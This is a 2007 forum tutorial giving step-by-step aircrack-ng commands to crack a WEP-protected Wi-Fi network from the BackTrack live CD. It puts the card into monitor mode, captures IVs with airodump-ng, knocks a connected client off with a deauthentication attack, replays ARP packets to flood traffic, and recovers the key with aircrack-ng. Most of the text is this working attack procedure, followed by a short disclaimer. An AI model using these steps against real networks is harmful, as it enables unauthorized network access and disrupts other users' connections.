AIRCRACK
ON BACKTRACK WITH CLIENTS ( WEP )
Ok, this tutorial should be pretty straightforward and easy, then
again, thats the entire idea behind a tutorial right? Anyway, to
business, this tutorial will show you how to crack WEP very quickly
using the aircrack on the backtrack security liveCD, that you can find
here;
http://www.remote-exploit.org/backtrack.html
**quick note, cracking WEP with no clients will be out tonight/sometime
real soon**
We will go over
1) Putting your atheros based card into monitor mode
2) Getting packet injection ready
3) injecting/sniffing
4) Cracking the WEP
This is the easier method, the one where the WEP has clients present,
and you can use a deauth attack on them. Ok, enough talk, to business!
Monitor Mode
The first thing to do is boot up backtrack, basically by booting to a
CD like you normally would, if you can't figure this out, ask down
below, or go use google. login to backtrack under root (password
'toor'), and then type "startx" into the command line to start out GUI.
Sweet, now we are running *nix, and we can start the good stuff. Open
up a command line, but clicking on the icon that looks like one on the
bottom next to the 'start' type thingy (let me know if I get to
technical Smile )
Now, we need to enter this into the command line;
Code:
$ airmon-ng start wifi0 6
**starts wifi0 on channel 6, change for the channel of the network you
are attacking, use kismet for this, not covered in this tutorial**
$ wlanconfig ath0 destroy
$ ifconfig ath1 up
$ iwconfig ath1 mode monitor 6
Sweet, now we have our card in monitor mode, and we can move onto
bigger and better things.
Start up Airodump and getting some info ready
ok, lets start airodump so we can get some info out of it, and then we
can just leave it running.
Code:
$ airodump-ng --ivs --write bob --channel 6 ath1
**basically heres what each thing means;
--ivs= only write the weak IV's, not every packet
--write= the prefix of the file we are writing to, so bob.ivs
--channel= the channel to scan on
ath1= our network device**
Now that airodump is running, we need to snag a couple pieces of
information from it, 1) The MAC address of the AP we are attacking,
it'll be in the first column. 2) the MAC address of a computer
connected to that network.
Now, open up a new terminal (DON"T CLOSE AIRODUMP). type these lines in;
Code:
$ export AP=mac_of_ap
$ export MAC=mac_of_connected_computer
This basically just stored those as variables, so you don't have to
type them a bunch of times in the coming steps.
Getting everything ready
Good, now we have airodump running, and we can move onto getting packet
injection ready. In the new console we opened up to export things into
our new variables type in the following, but do NOT run it yet;
Code:
$ aireplay-ng -0 10 -a $AP -c $MAC ath1
ok, we are running aireplay-ng attack 0 ten times ("-0 10"), which is a
death attack, it means we will kick them off the network, so we can
steal their ARP packets, to replay them. "-a" is the MAC address of the
AP we are attacking that we stored before, -c is the client we are
deauthing, and again ath1 is our interface
Now, lets get aireplay ready to snag those ARP packets we are going to
get;
Code:
$ aireplay-ng -3 -b $AP -h $MAC ath1
really quickly, this is attack number 3, it will wait until it finds an
arp packet it can replay, it will ask you if you want to use the packet
it finds, say yes (type in y, press enter), and it will replay them,
getting you alot of IV's
Good, everything is ready, on to the actual thing!
The Attack!
Now, we have 2 attacks just chillin there ready to go, and airodump
still in the background running. Start attack number 3 (the replay)
first, then run your deauth attack. The replay attack will eventually
find a packet, and it will ask if you want to use that one, say yes
(type in y). Now look at airodump!
Your #data column should be shooting up on the AP you are attacking! It
took me about 3 minutes to collect 100k data, more then enough for a
64bit WEP key. Now, to crack the key, we need to type in one more
command, and wait less then a minute. You don't have to close anything,
or stop airodump/aireplay.
Go to the window we used for the deauth attack, and type in this
command;
Code:
aircrack-ng -n 64 -b $AP *.ivs
poof, aircrack should start, and in a few moments, you should have your
WEP key! If not, wait a bit longer, and try again. If all else fails,
it might be a 128 bit, and you will need about a million #data's, and
change "-n 64" to "-n 128", and try again. If you don't get it then, I
don't know what to tell you!
I hope you learned something/got an idea of something, and you enjoyed
yourself! Remember, Soon I will be posting cracking WEP on a network
with no clients present.
**Obligatory Disclaimer; This tutorial was written as an education
piece, cracking into somebody else's network is illegal and punishable
by fine/jail. Don't be stupid**
Original Tutorial
by jaymill230 for TheTAZZone-TAZForum
Originally posted on May 1st, 2007 here
Do not use, republish, in whole or in part, without the consent of
the Author. TheTAZZone policy is that Authors retain the rights to the
work they submit and/or post...we do not sell, publish, transmit, or
have the right to give permission for such...TheTAZZone merely retains
the right to use, retain, and publish submitted work within it's
Network.